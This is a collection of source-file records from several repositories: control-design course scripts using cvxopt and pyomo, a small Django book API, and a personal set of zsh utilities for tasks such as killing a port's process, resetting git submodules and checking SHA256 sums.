"text": "# Intro\n\nThis is a repo for UC Berkeley C231 class\n\n# Content\n\nincluding the lab file and solution to homework etc.\nfor lab file python version: check py_files.\n"
},
{
"alpha_fraction": 0.4649406671524048,
"alphanum_fraction": 0.5106077194213867,
"avg_line_length": 18.047945022583008,
"blob_id": "db0a0f6036da0e0e506a17c6f05b6d3716fbed7e",
"content_id": "999ad34414bd89fbd6b43fcfaaad99601e502c2c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2781,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 146,
"path": "/py_files/lab2_optimization_cvxpy.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# solving linear and quadratic programming using cvxopt\n\n# %% Linear programming example \n\nimport numpy as np \nimport cvxopt \n\n\nc = np.ones(3)\nG = np.array(\n [[-1,0,0],\n [0,-1,0],\n [0,0,-1],\n [-1,1,-1]]\n)\nh = np.array([2,1,3,-4])\nc = cvxopt.matrix(c,tc = 'd')\nG = cvxopt.matrix(G,tc = 'd')\nh = cvxopt.matrix(h,tc = 'd')\n\nsol = cvxopt.solvers.lp(c,G,h)\nxOpt = sol['x']\nJ = sol['primal objective']\n# print(xOpt)\n# print(J)\n\n# %% quadratic programs and constrained least-squares exercise \n\nn= 5\nA = np.random.randn(n,n)\nb = np.random.randn(n)\nl_i = -.5\nu_i = .5\n\nP = 2 * A.T @ A \nq = -2 * A.T @ b\n# G = np.vstack((np.eye(n),-np.eye(n)))\nG = np.concatenate([np.eye(n),-np.eye(n)],axis=0)\nh = np.concatenate([u_i*np.ones((n,)),-l_i* np.ones((n,))],axis=0)\n# h = np.hstack((u_i*np.ones((n,)),-l_i* np.ones((n,))))\n# h = np.vstack((u_i*np.ones((n,1)),-l_i* np.ones((n,1))))\n#### 1D array can be (n,1) or (1,n) ######\n\nP = cvxopt.matrix(P, tc='d')\nq = cvxopt.matrix(q, tc='d')\nG = cvxopt.matrix(G, tc='d')\nh = cvxopt.matrix(h, tc='d')\nsol = cvxopt.solvers.qp(P,q,G,h)\n\n# print('x*=', sol['x'])\n# print('p*=', sol['primal objective'] + b.T@b)\n\n\n# %% exercises \n\n# n = 2\n# c = np.array([3,2])\n# G = -np.eye(2)\n# h = np.array([0,0]).reshape(n,1)\n\n\n# n = 2\n# c = np.array([1,0])\n# G = -np.eye(2)\n# h = np.array([0,0]).reshape(n,1)\n\n\n\n# c = np.array([-5,-7])\n# G = np.array([\n# [-3,-2],\n# [-2,1],\n# [-1,0],\n# [0,-1]\n# ])\n# h = np.array([30,12,0,0]).reshape(4,1)\n\nc = np.array([3,1])\nG = np.array([\n [1,-1],\n [3,2],\n [2,3],\n [2,-3],\n [0,-1],\n [-1,0]\n])\nh = np.array([1,12,3,-9,0,0])\n\nc = cvxopt.matrix(c, tc='d')\nG = cvxopt.matrix(G, tc='d')\nh = cvxopt.matrix(h, tc='d')\n\nsol = cvxopt.solvers.lp(c,G,h)\nxOpt = sol['x']\nJ = sol['primal objective']\n# print(xOpt)\n# print(J)\n\n# %% quadratic exercises\n\n# P = 2 * np.eye(2)\n# q = np.zeros((2,1))\n# G = -np.eye(2)\n# h = np.array([-1,-1]).reshape((2,1))\n\n# P = 2 * np.diag([2,7])\n# q = np.zeros((2,1))\n# G = np.diag([-1,1])\n# h = np.array([3,2])\n\n# P = 2 * np.eye(2)\n# q = np.zeros((2,1))\n# G = np.array([\n# [1,0],\n# [0,1],\n# [4,3]\n# ])\n# h = np.array([-3,4,0])\n\n\n# P = cvxopt.matrix(P,tc = 'd')\n# q = cvxopt.matrix(q,tc = 'd')\n# G = cvxopt.matrix(G,tc = 'd')\n# h = cvxopt.matrix(h,tc = 'd')\n\n# sol = cvxopt.solvers.qp(P,q,G,h)\n# print('x* = ',sol['x'])\n# print('J* = ',sol['primal objective'])\n\nP = np.diag([1,1,0.1])\nq = np.array([0,0,.55])\nG = -np.eye(3)\nh = np.zeros((3,1))\nA = np.ones((1,3))\nb = np.ones(1)\n\nP = cvxopt.matrix(P,tc = 'd')\nq = cvxopt.matrix(q,tc = 'd')\nG = cvxopt.matrix(G,tc = 'd')\nh = cvxopt.matrix(h,tc = 'd')\nA = cvxopt.matrix(A,tc = 'd')\nb = cvxopt.matrix(b,tc = 'd')\n\nsol = cvxopt.solvers.qp(P,q,G,h,A,b)\nprint('x* = ',sol['x'])\nprint('J* = ',sol['primal objective'])\n"
},
{
"alpha_fraction": 0.46443966031074524,
"alphanum_fraction": 0.506465494632721,
"avg_line_length": 22.225000381469727,
"blob_id": "3371267b7f55a531ca1c3e864ede9d626a5d5522",
"content_id": "727f7846d0215646ae814362d932278a6d2e0da4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 40,
"path": "/midterm_exam/B2.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "import numpy as np \nimport cvxopt\n\n\ndef reg1Inf(A_in,b_in,c_in,d_in):\n # the question transformed to:\n # min(x1,x2,x3,t){t}\n # t = max(|A_in *x - b_in|)\n\n n_1, nx = np.shape(A_in)\n\n c = np.array([0]*nx + [1])\n A = np.concatenate(\n [\n np.concatenate([A_in,-np.ones((2,1))],axis=1),\n np.concatenate([-A_in,-np.ones((2,1))],axis=1),\n np.concatenate([c_in,np.zeros((2,1))],axis= 1)\n ],axis = 0\n )\n\n b = np.concatenate([b_in,-b_in,d_in],axis=0)\n\n c = cvxopt.matrix(c,tc='d')\n A = cvxopt.matrix(A,tc='d')\n b = cvxopt.matrix(b,tc='d')\n\n\n sol = cvxopt.solvers.lp(c,A,b)\n xOpt = sol['x']\n J = sol['primal objective']\n return xOpt[:nx],J \n\n\na = np.array([[2,0,-1],[1,-1,0]])\nb = np.array([1,2]).reshape((2,1))\nc = np.array([[1,-1,1],[-1,-1,0]])\nd = np.array([-1,-1]).reshape((2,1))\nxOpt, J = reg1Inf(a,b,c,d)\nprint('xOpt: ',xOpt)\nprint('J* = ',J)"
},
{
"alpha_fraction": 0.5688164830207825,
"alphanum_fraction": 0.6126994490623474,
"avg_line_length": 24.5,
"blob_id": "2e1b0840ae71bf0c7379f560fe02cb101fbd9132",
"content_id": "8342ec2828db1ba9ff75bfa254e5cc37b104cc21",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3008,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 118,
"path": "/py_files/Lab5_NCFTOCP.py",
"repo_name": "ZionDeng/Advanced-Control-Design",
"src_encoding": "UTF-8",
"text": "# nonlinear constrained finite time optimal control \n\nimport matplotlib.pyplot as plt \nimport numpy as np \nimport pyomo.environ as pyo \n\nTau = 0.2 \nGamma = 10 \nTs = 0.05 \nN = 120 \nTFianl = Ts * N \n\nNx = 2\nNu = 1 \nUdotLim = 0.03\n\ndef disc_dyn(x,u):\n x_next = np.empty((Nx,))\n x_next[0] = x[0] + Ts*(np.sin(x[0]) + Gamma * np.arctan(x[1]))\n x_next[1] = x[1] + Ts / Tau * (x[1] - u)\n return x_next\n\ntValues = [0,3,3.5,5.5,6]\nxDesValues = [0, 0.75*np.pi/4, 0.67*np.pi/4, 1.25*np.pi/4, 1.25*np.pi/4]\n\nfrom scipy import interpolate\n\nf = interpolate.interp1d(tValues,xDesValues,'linear')\ntGrid = np.linspace(tValues[0],tValues[-1],N+1)\nxDesired = f(tGrid)\n\n# plt.scatter(tGrid,xDesired)\n# plt.show()\n\nmodel = pyo.ConcreteModel()\nmodel.tidx = pyo.Set(initialize = range(N+1))\nmodel.xidx = pyo.Set(initialize = range(Nx))\nmodel.uidx = pyo.Set(initialize = range(Nu))\n\nmodel.x = pyo.Var(model.xidx, model.tidx) \nmodel.u = pyo.Var(model.uidx, model.tidx)\n\nmodel.cost = pyo.Objective(\n expr = sum((model.x[0,t] - xDesired[t])**2 for t in model.tidx if t<N),\n sense = pyo.minimize\n)\n\n# constraints \nmodel.cons1 =pyo.Constraint(\n model.xidx, rule = lambda model, i:\n model.x[i,0] == 0\n)\nmodel.cons2 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.x[0,t+1] == model.x[0,t]+ Ts * (pyo.sin(model.x[0,t]) + Gamma * pyo.atan(model.x[1,t])) if t<N else pyo.Constraint.Skip\n)\nmodel.cons3 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.x[1,t+1] == model.x[1,t] + Ts/Tau * model.x[1,t] - model.u[0,t]\n if t < N else pyo.Constraint.Skip\n)\n\nmodel.cons4 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.u[0,t+1] - model.u[0,t] >= -Ts * UdotLim\n if t<N-1 else pyo.Constraint.Skip\n)\n\nmodel.cons5 = pyo.Constraint(\n model.tidx, rule = lambda model,t:\n model.u[0,t+1] - model.u[0,t] <= Ts * UdotLim\n if t<N-1 else pyo.Constraint.Skip\n)\n\n# model.cons6 = pyo.Constraint(\n# expr = model.x[0,N] -xDesired[N] <= 0.025* xDesired[N]\n# )\n\n# model.cons7 = pyo.Constraint(\n# expr = -0.025* xDesired[N] <= model.x[0,N] -xDesired[N] \n# )\nmodel.constraint6 = pyo.Constraint(expr = 0.975*xDesired[N] - model.x[0, N] <= 0.0)\nmodel.constraint7 = pyo.Constraint(expr = model.x[0, N] - 1.025*xDesired[N] <= 0.0)\n\nresult = pyo.SolverFactory('ipopt').solve(model)\n\nx1 = [model.x[0,0]()]\nx2 = [model.x[1,0]()]\nu = [model.u[0,0]()]\n\nfor t in model.tidx:\n if t<N:\n x1.append(model.x[0,t+1]())\n x2.append(model.x[1,t+1]())\n if t<N-1:\n u.append(model.u[0,t+1]())\n\n# plt.figure()\n# plt.plot(tGrid, x1,'b')\n# plt.plot(tGrid, x2,'g')\n# plt.plot(tGrid[0:-1], u,'r')\n# plt.show()\n\n\nx_actual = np.zeros((Nx,N+1))\nfor t in range(N):\n x_actual[:,t+1] = disc_dyn(x_actual[:,t],u[t])\n\nplt.figure()\nplt.plot(tGrid,x_actual[0,:],'b')\nplt.plot(tGrid,xDesired,'g')\nplt.plot(tGrid,x1,'--r')\nplt.legend(['Actual','Desired','open-loop'])\nplt.xlabel('Time')\nplt.ylabel('x1 Trajectory')\nplt.show()\n\n# --------------result is abnormal -------------"
}
] | 19 |
usmanafridi/Django_APIBASIC
|
https://github.com/usmanafridi/Django_APIBASIC
|
b5ea192bb8f76d95e1d9be0490cdb5dbc2cb7dc9
|
c9ef54e9b7647925a270c8e248cfac49a5cd8317
|
ee28db1e274132bcfffd4a018061792f986cbef9
|
refs/heads/main
| 2023-08-24T11:38:08.250776 | 2021-11-02T11:44:39 | 2021-11-02T11:44:39 | 423,821,626 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 19,
"blob_id": "d9a719cdba2ce2833c8ddedede9d938eacc02caa",
"content_id": "b4bcd8847fd64e6f4cef1bc9da88922dc32f0c66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 21,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 1,
"path": "/README.md",
"repo_name": "usmanafridi/Django_APIBASIC",
"src_encoding": "UTF-8",
"text": "\"# Django_APIBASIC\" \n"
},
{
"alpha_fraction": 0.8286852836608887,
"alphanum_fraction": 0.8286852836608887,
"avg_line_length": 21.81818199157715,
"blob_id": "803fc9221aaf67090048ba4f637ad91f71db5083",
"content_id": "edc0aeb12029fe7713f28a0d06d678d8782e410a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 251,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 11,
"path": "/api/views.py",
"repo_name": "usmanafridi/Django_APIBASIC",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom rest_framework import generics\nfrom books.models import Book\n\nfrom .serializers import BookSerializer\n\n\nclass BookAPIView(generics.ListAPIView):\n\tqueryset= Book.objects.all()\n\tserializer_class= BookSerializer\n"
},
{
"alpha_fraction": 0.8011049628257751,
"alphanum_fraction": 0.8011049628257751,
"avg_line_length": 21.625,
"blob_id": "c7f09d4d3cf2e1575e048fcf6f72e4d47718c83a",
"content_id": "b02979249e53f7d744ca241a5935d11aa2fa0033",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 181,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/books/views.py",
"repo_name": "usmanafridi/Django_APIBASIC",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import render\n\nfrom django.views.generic import ListView\nfrom .models import Book\n\nclass BookListView(ListView):\n\tmodel= Book\n\ttemplate_name= 'book_list.html'\n"
}
] | 3 |
calebbarr/MindflexAlpha
|
https://github.com/calebbarr/MindflexAlpha
|
77e383f3e9bc45e94fc60a67e48af41f6feab984
|
ae683c9f4af44dad8f0218cb415ba8c49fb72e1e
|
4544adc1a152c53d49bcb76c262acc3c0f27411e
|
refs/heads/master
| 2021-01-20T09:32:40.112054 | 2018-07-25T17:56:16 | 2018-07-25T17:56:16 | 21,874,179 | 3 | 2 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6576728224754333,
"alphanum_fraction": 0.6930860280990601,
"avg_line_length": 24.826086044311523,
"blob_id": "bd1b734b7aa6d111bddd632c60aaa9890265688f",
"content_id": "4b6097296118a5d67dce4147e6aca5ffe0aa5358",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 593,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 23,
"path": "/extra/mindflex_test.py",
"repo_name": "calebbarr/MindflexAlpha",
"src_encoding": "UTF-8",
"text": "from random import randint as r\nimport socket\n\nfrom twisted.internet import reactor\nfrom twisted.internet import task\n\n\ndef sendFakeBrainwaves():\n brainwaves = \",\".join(\n [str(x) for x in \\\n [0] +\\\n [r(0,100) for x in range(2)] +\\\n [r(0,100000) for x in range(8)]\n ])+\"\\n\"\n print brainwaves\n clientsocket.send(brainwaves)\n\nserversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserversocket.bind(('localhost', 9990))\nserversocket.listen(1)\nclientsocket, address = serversocket.accept()\ntask.LoopingCall(sendFakeBrainwaves).start(1.0)\nreactor.run()"
},
{
"alpha_fraction": 0.7137585878372192,
"alphanum_fraction": 0.7706905603408813,
"avg_line_length": 85.2272720336914,
"blob_id": "a8fb27ff23c4056970b3cf859f2628df1b71d1de",
"content_id": "17bc7958113dc169f1e7279a12b1940ffa9e0d00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1897,
"license_type": "no_license",
"max_line_length": 505,
"num_lines": 22,
"path": "/README.md",
"repo_name": "calebbarr/MindflexAlpha",
"src_encoding": "UTF-8",
"text": "#MindflexAlpha\n\nStreaming analytics on brain waves, extensible to various applications. Requires a modified Mindflex EEG.\n\n## modifying the Mindflex\n\n* Use Arduino IDE to flash the [sketch](https://github.com/calebbarr/MindflexAlpha/blob/master/embedded/MindflexAlphaArduinoSketch.pde) onto an [Arduino Fio](http://arduino.cc/en/Main/ArduinoBoardFio). It depends on the [Arduino Brain Library](https://github.com/kitschpatrol/Brain). You may need to hit [reset](http://stackoverflow.com/a/20735393/1215687) at the correct time.\n* Connect the T pin on the [Neurosky daughterboard](http://frontiernerds.com/files/imagecache/full-screen/t-pin-soldered.jpg) of a [Mindflex](http://www.ebay.com/sch/i.html?_from=R40&_trksid=p2050601.m570.l1313.TR0.TRC0.H0.Xmindflex+duel+replacement+headset&_nkw=mindflex+duel+replacement+headset&_sacat=0) headset to the [D2](http://www.instructables.com/file/F49LH28GZLW9939) pin of the Fio. Connect [ground](http://frontiernerds.com/files/imagecache/full-column/4492255397_b86e4a8b56_o.jpg) to ground.\n* Connect a [Bluetooth Bee](http://www.seeedstudio.com/depot/Bluetooth-Bee-p-598.html) and a [LiPo battery](https://www.sparkfun.com/products/731).\n\n## communicating with the Mindflex\n* \tPair mindflex\n* \t`brew install ser2net`\n*\t\t/usr/local/sbin/ser2net -C 9999:raw:0:/dev/tty.mindflex-DevB:38400,XONXOFF -u\n* \tConfirm you are proxying serial traffic with: \n\t* \t`lsof -i :9999`\n* \tView Mindflex data:\n\t* \t`nc localhost 9999`\n\n## visualizing the Mindflex\n* \t[Serve](http://web.archive.org/web/20160305051535/https://echo.co/blog/os-x-1010-yosemite-local-development-environment-apache-php-and-mysql-homebrew) the [website directory](https://github.com/calebbarr/MindflexAlpha/tree/master/website) with any web server.\n* \tIt will listen on `8081` and visualize brainwaves using [flot](http://www.flotcharts.org/).\n"
}
] | 2 |
MartinHarding/chelys
|
https://github.com/MartinHarding/chelys
|
9da586bb6515f6b17e135ff0ec8e57f706bdc5e1
|
522e07cf9c1311bf8314618fff2b17815339316d
|
566f81184bc049dd35878e8973d5d57f7903746b
|
refs/heads/master
| 2021-11-11T14:48:54.400372 | 2021-11-09T12:41:45 | 2021-11-09T12:41:45 | 227,717,978 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5748792290687561,
"alphanum_fraction": 0.5764895081520081,
"avg_line_length": 46.769229888916016,
"blob_id": "5b1c338b907116e11c249081e30ee27fe8a03a4c",
"content_id": "3a072f74c316d75b5873b498eed797a73db788e7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 621,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 13,
"path": "/includes/command_defaults.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "# alias cp='cp -iv'\n# alias mv='mv -iv'\n# alias mkdir='mkdir -pv'\nalias ls='ls -FGlAh'\n# alias less='less -FSRXc'\n# alias resource=\"source ~/.bash_profile\"\n# alias edit=$EDITOR # Opens file or directory in Editor\n# alias f='open -a Finder ./' # Opens current directory in Finder\n# alias c='clear' # Clear terminal display\n# alias lsn='echo $(ls -1 | wc -l)' # Count of non-hidden files in current dir\n# alias which='type -all' # Find executables\n# alias PATHS='echo -e ${PATH//:/\\\\n}' # Echo all executable Paths\n# alias ps='ps aux'\n"
},
{
"alpha_fraction": 0.6461538672447205,
"alphanum_fraction": 0.6615384817123413,
"avg_line_length": 23.375,
"blob_id": "e7bebb4d0c967dae05e6afe70ab91c85b34babe9",
"content_id": "4dd9e826d4a547e35750390a74945a03f2c30af0",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 195,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 8,
"path": "/bin/portkill",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Port kill finds the process hogging the port which is passed and kills it\n#\n# Usage:\n# portkill <PORT>\n\nlsof -nP -i4TCP:$1 | grep LISTEN | awk '{print $2}' | xargs kill\n"
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6136363744735718,
"avg_line_length": 7.800000190734863,
"blob_id": "87ad76d36f8d69bc79c4d269871dcb5eeed595cd",
"content_id": "548a9b39aeb5983f263e881f916d1508525705af",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 44,
"license_type": "permissive",
"max_line_length": 22,
"num_lines": 5,
"path": "/bin/day",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\n# Gets the current day\n\ndate +%j\n"
},
{
"alpha_fraction": 0.5629077553749084,
"alphanum_fraction": 0.5731593370437622,
"avg_line_length": 25.170732498168945,
"blob_id": "88a907015e0c169d5a0f6719d498e4bc5e48b67a",
"content_id": "fd0a3849d9de0bf1bda43a9f9c9b86ed21c90f58",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1073,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 41,
"path": "/bin/git-unfuck",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Unfuck things with a git repo\n#\n# Usage:\n# git unfuck submodules\n#\n# Options:\n# help|-h show this help menu\n# submodules|-s forgets all submodules as if you cloned the repo without submodule init\n\n[[ $COLOR_CLEAR ]] || COLOR_CLEAR='\\e[0m'\n[[ $COLOR_WARN ]] || COLOR_WARN='\\e[1;33mWARNING:'\n[[ $COLOR_ERROR ]] || COLOR_ERROR='\\e[1;31mERROR:'\n\nGIT_UNFUCK_SCRIPT_PATH=\"$0\"\n\ngit_unfuck() {\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'submodules'|d) git_unfuck_submodules $@;;\n 'help'|'--help'|-h|h|'') git_unfuck_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\ngit_unfuck_help() {\n sed '/^#\\!.*/d' $GIT_UNFUCK_SCRIPT_PATH | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g'\n}\n\ngit_unfuck_submodules() {\n local _submodules\n _submodules=$(git config --file .gitmodules --get-regexp path | awk '{print $2}')\n for _submodule in $_submodules; do\n git submodule deinit -f -- $_submodule\n done\n}\n\ngit_unfuck $@\n"
},
{
"alpha_fraction": 0.5445343852043152,
"alphanum_fraction": 0.5506072640419006,
"avg_line_length": 30.870967864990234,
"blob_id": "4f75f8f98db17e418e14db8fd4517aebe6fcbb0e",
"content_id": "f13ab19e3a606ef08473e13bc974760bf579e5c5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 988,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 31,
"path": "/bin/rdb",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env zsh\n\n# Reset or migrate a Rails database using rake. Pass dev or test after the command to choose an environment.\n#\n# Usage:\n# rdb <COMMAND> <ENVIRONMENT>\n\nrdb() {\n local _command _environment\n while [ ! -z $1 ]; do\n case $1 in\n \"reset\") _command='rake db:drop db:create db:schema:load';;\n \"migrate\") _command='rake db:migrate';;\n \"dev\") _environment='development';;\n \"test\") _environment='test';;\n *) echo \"'$1' is not a valid argument\" && return 1;;\n esac\n shift\n done\n ! [[ \"$_command\" ]] && echo \"Pass a command ('reset', 'migrate')\" && return 1\n ! [[ \"$_environment\" ]] && echo \"Pass an environemnt ('test', 'dev')\" && return 1\n\n if [[ `echo \"$_command\" | grep 'db:drop'` ]] && [[ $_environment == 'development' ]]; then\n _command=\"$_command db:seed\"\n fi\n _final=\"RAILS_ENV=$_environment bundle exec $_command\"\n echo \"$_final\"\n eval $_final\n}\n\nrdb $@\n"
},
{
"alpha_fraction": 0.5560035705566406,
"alphanum_fraction": 0.5611559152603149,
"avg_line_length": 29.16216278076172,
"blob_id": "f2ad7ef5cf875b0e56d233864162def22ddda84d",
"content_id": "7e09cac82474113daa4bdf8dea68c40bdff34287",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 4464,
"license_type": "permissive",
"max_line_length": 127,
"num_lines": 148,
"path": "/chelys.sh",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/bin/zsh\n\n# A set of minimal utilities and scripts which hold up my world.\n#\n# Usage:\n# chelys <COMMAND>\n# chelys help <BIN | INCLUDE>\n# chelys (-h | --help)\n#\n# Commands:\n# doctor Checks Chelys for potential problems.\n# help Show help on a specific bin or include file.\n# fix Attempts to fix problems found by the doctor command.\n# reload Runs 'source ~/.chelys/chelys.sh' to reload all files without restarting your shell.\n# update Does a git pull against the default remote repository for Chelys.\n#\n# Options:\n# -h --help Show this screen.\n\nset -o pipefail\n\nCHELYS_PATH=$(CDPATH= cd -- \"$(dirname -- \"$0\")\" && pwd)\nCHELYS_SOURCED_COMMIT=$(cd $CHELYS_PATH; git rev-parse HEAD)\n\n# TODO: make bin linking optional\nexport PATH=\"$CHELYS_PATH/bin:$PATH\"\n\nCOLOR_CLEAR='\\e[0m'\nCOLOR_WARN='\\e[1;33mWARNING:'\nCOLOR_ERROR='\\e[1;31mERROR:'\n\nfor include_file in $CHELYS_PATH/includes/*; do\n source $include_file\ndone\n\nfor env_file in $CHELYS_PATH/bin/*.env; do\n source $env_file\ndone\n\nchelys() {\n local _cmd=$1\n [[ $_cmd ]] && shift\n\n case $_cmd in\n 'doctor'|d) chelys_doctor;;\n 'reload'|r) chelys_reload;;\n 'update'|u) chelys_update;;\n 'edit'|e) chelys_edit;;\n 'fix'|f) chelys_fix;;\n 'help'|'--help'|-h|h|'') chelys_help $@;;\n *) echo \"$COLOR_ERROR $_cmd is not a valid command $COLOR_CLEAR\" && return 1;;\n esac\n}\n\nchelys_help() {\n local _cmd=$1 _file_path _runner _help_text\n\n if [[ $_cmd ]]; then\n _file_path=\"$CHELYS_PATH/bin/$_cmd\"\n else\n printf \"\\e[1;32m\"\n cat \"$CHELYS_PATH/turtle.txt\"\n echo $COLOR_CLEAR\n _file_path=\"$CHELYS_PATH/chelys.sh\"\n fi\n\n _runner=$(head -n1 $_file_path)\n\n if [[ \"$_runner\" == '#!'*sh ]] || [[ \"$_runner\" == '#!'*ruby ]]; then\n _help_text=$(sed '/^#\\!.*/d' $_file_path | sed '/^$/d' | sed -n '/^[^#]*$/!p;//q' | sed 's/^# //g;s/^#//g')\n [[ $_help_text ]] && echo \"$_help_text\" || echo \"$COLOR_WARN $_file_path appears to have no help text.\"\n else\n echo \"$COLOR_ERROR $_file_path '$_runner' help headers are not supported.\"\n fi\n}\n\nchelys_reload() {\n echo \"Reloading Chelys...\"\n source $CHELYS_PATH/chelys.sh\n}\n\nchelys_doctor() {\n local _current_commit=\"$(cd $CHELYS_PATH; git rev-parse HEAD)\" _help_text\n if [[ $CHELYS_SOURCED_COMMIT != $_current_commit ]]; then\n echo \"$COLOR_WARN sourced commit is $CHELYS_SOURCED_COMMIT but current commit is $_current_commit $COLOR_CLEAR\"\n fi\n\n if [[ $(git status | grep 'working tree clean') ]] || echo \"$COLOR_WARN $CHELYS_PATH has uncomitted changes $COLOR_CLEAR\"\"\"\n\n for bin_file in $CHELYS_PATH/bin/*; do\n [[ $bin_file = *.env ]] && continue\n [[ -x \"$bin_file\" ]] || echo \"$COLOR_ERROR $bin_file is not executable $COLOR_CLEAR\"\n _help_text=$(chelys_help `basename $bin_file`)\n case $_help_text in\n *WARNING:*) echo $_help_text;;\n *ERROR:*) echo $_help_text;;\n *);;\n esac\n done\n}\n\nchelys_fix() {\n for bin_file in $CHELYS_PATH/bin/*; do\n [[ $bin_file = *.env ]] && continue\n [[ -x \"$bin_file\" ]] || echo \"Making '$bin_file' executable $COLOR_CLEAR\" && chmod +x $bin_file\n done\n}\n\nchelys_update() {\n ( cd $CHELYS_PATH; git pull )\n}\n\nchelys_edit() {\n if [[ -f $CHELYS_PATH/EDITOR ]]; then\n EDITOR=$(cat $CHELYS_PATH/EDITOR)\n else\n while true; do\ncat <<EOF\nNo default editor set, please choose one:\n1) VS Code: 'code -w'\n2) Nano 'nano'\n3) VIM 'vim'\n4) Enter your own\nEOF\n printf \"Choice: \"\n read -r CHOICE\n case $CHOICE in\n \"1\") EDITOR=\"code -w\"; break;;\n \"2\") EDITOR=\"nano\"; break;;\n \"3\") EDITOR=\"vim\"; break;;\n \"4\") printf \"Enter command: \"; read -r EDITOR; break;;\n *) echo \"$COLOR_ERROR invalid option '$CHOICE'$COLOR_CLEAR\";;\n esac\n done\n echo \"Do you want to make '$EDITOR' the default command for editing Chelys?\"\n echo \"You can always change this by modifying $CHELYS_PATH/EDITOR\"\n while true; do\n printf \"y/n: \"\n read -r CONFIRM\n case $CONFIRM in\n \"y\") echo \"$EDITOR\" > $CHELYS_PATH/EDITOR; break;;\n \"n\") break;;\n *) echo \"$COLOR_ERROR invalid option '$CONFIRM'$COLOR_CLEAR\";;\n esac\n done\n fi\n eval $EDITOR $CHELYS_PATH\n}\n"
},
{
"alpha_fraction": 0.5736568570137024,
"alphanum_fraction": 0.6048526763916016,
"avg_line_length": 22.079999923706055,
"blob_id": "b1c543d6201749b4e40cb008bde95c0eed224a65",
"content_id": "41ccbd87e489628eb483b544edec77dd10a0328d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 577,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 25,
"path": "/bin/chk",
"repo_name": "MartinHarding/chelys",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n\n# Validates a file's SHA256 checksum against a pre-computed value\n#\n# Usage:\n# chk <FILE> <SHA256-SUM>\n\n__sha_actual=\"`shasum -a 256 $1 | awk '{print $1}'`\"\nif [ -f \"$2\" ]; then\n __sha_expected=\"`cat $2 | awk '{print $1}'`\"\nelse\n __sha_expected=\"`echo $2 | awk '{print $1}'`\"\nfi\n\nif [[ \"$__sha_actual\" == \"$__sha_expected\" ]]; then\n echo -e \"SUCCESS: Checksums match\\n\\\nExpected: $__sha_expected\\n\\\n Actual: $__sha_actual\"\n exit 0\nelse\n echo -e \"ERROR: Checksum does not match\\n\\\nExpected: $__sha_expected\\n\\\n Actual: $__sha_actual\"\n exit 1\nfi\n"
},
{
"alpha_fraction": 0.46666666865348816,
"alphanum_fraction": 0.48571428656578064,
"avg_line_length": 10.666666984558105,
"blob_id": "4cb1984e327b259f663be875714e71159d58e36d",
"content_id": "cde664caaf019db4e4adad3c415a5e22d2213774",
